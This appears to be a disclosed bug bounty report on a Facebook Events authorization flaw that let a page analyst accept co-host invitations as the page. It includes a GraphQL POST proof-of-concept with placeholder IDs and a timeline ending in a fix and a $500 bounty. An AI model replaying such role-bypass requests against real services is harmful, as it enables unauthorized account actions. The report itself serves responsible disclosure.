A C

Published On: 17 May 2019

Accept the request to co-host a event as a page analyst

Privacy/Authentication
Facebook | IOS
---
LOW VALID

Thank @Max(Max Pasqua) for making write-up for me.

Description

Within Facebook Events there's a feature to invite other pages or people to co-host an event. Normally the roles are restricted that could accept the invite but Facebook was not properly checking the roles of the user making the request allowing a page analyst to accept the request and co-host the event.

Impact

Page analyst can accept co-host requests for an event as the page.




Reproduction Steps

Step
1

HTTP POST

graph.facebook.com/graphql/

doc_id = DOCID

variables = {"0":{"page_id":"PAGEID","admin_status":"ACCEPTED","actor_id":"PAGEID","context":{"event_action_history":[{"mechanism":"unknown","surface":"notifications_view"},{"mechanism":"surface","surface":"events_permalink"}]},"client_mutation_id":"","event_id":"EVENTID"}}


Videos

Timeline
.
A 10 Feb 2019

Initial Report

.
Facebook 12 Feb 2019

Need more information Hi Richard, Thank you for the video and information. When I submitted your PoC I got the following error.

.
A 12 Feb 2019

Sending additional information

.
Facebook 13 Feb 2019

Need more information Hi Richard, Thank you for the question. I am using a valid page_access token and am using https://developers.facebook.com/tools/explorer to crea ... See More

.
A 13 Feb 2019

Sending additional information

.
Facebook 14 Feb 2019

Pre-triage Hi Richard, Thank you for your submission. We've managed to reproduce your report and will get back to you once we have had a chance to investi ... See More

.
Facebook 14 Feb 2019

Triaged Hi Richard, Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will ... See More

.
Facebook 27 Feb 2019

Fixed Hi Richard, We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch ... See More

.
A 27 Feb 2019

Confirmation

.
Facebook 13 Mar 2019

Bounty Awarded Hi Richard Cao, After reviewing this issue, we have decided to award you a bounty of $500. Below is an explanation of the bounty amount. Faceboo ... See More

VALID